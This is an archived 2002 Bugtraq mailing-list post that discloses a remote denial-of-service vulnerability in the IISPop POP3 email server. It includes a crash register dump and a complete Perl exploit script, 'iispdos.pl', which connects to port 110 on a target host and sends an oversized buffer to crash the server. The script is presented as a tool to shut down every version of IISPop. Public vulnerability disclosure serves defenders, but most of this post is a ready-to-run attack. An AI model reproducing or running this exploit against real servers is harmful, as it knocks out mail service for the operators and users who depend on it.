IISPop remote DOS
From: securma massine (securma@caramail.com)Date: 11/14/02
- Previous message: Chris Adams: "Re: Bind 8 bug experience"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: securma massine <securma@caramail.com> To: bugtraq@securityfocus.com Date: Thu, 14 Nov 2002 12:11:55 GMT+1
hi
The IISPop EMail Server (http://www.curtiscomp.com/)was
designed for small networks,This is a POP3 only server,
designed to be paired with the SMTP server bundled in
Windows 2000/IIS 5.
I have found that IISpop is vulnerable has a attack DOS
caused by sends of a broad buffer (289999 byte) this attack
gives the following state of the registers (tested on v
1.161 end 1.181)
Access violation - code c0000005 (first chance)
eax=00000041 ebx=00407d3d ecx=00000101 edx=000021ae
esi=0040693d edi=00437181
eip=77e76941 esp=0112ffb0 ebp=0000026c iopl=0 nv up
ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038
gs=0000 efl=00000206
KERNEL32!GetCurrentThreadId+4:
77e76941 0000 add [eax],al
ds:0023:00000041=??
(unhandled exeption in IISPop.exe (KRNELL32.DLL)
0xc0000005 : access violation
exploit:
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#
use IO::Socket;
$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n-->";
print "\tUsage: perl iispdos.pl <host> \n";
exit;
}
$remo = $ARGV[0];
$buffer = "A" x 289999;
print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $remo,
PeerPort
=> "110"))
{
print "-->";
print "\tConnection Failed...\n";
exit;
}
print $so "$buffer\n";
close $so;
print "-->";
print "\tnow test if the distant host is down\n";
exit;
_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)
- Previous message: Chris Adams: "Re: Bind 8 bug experience"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
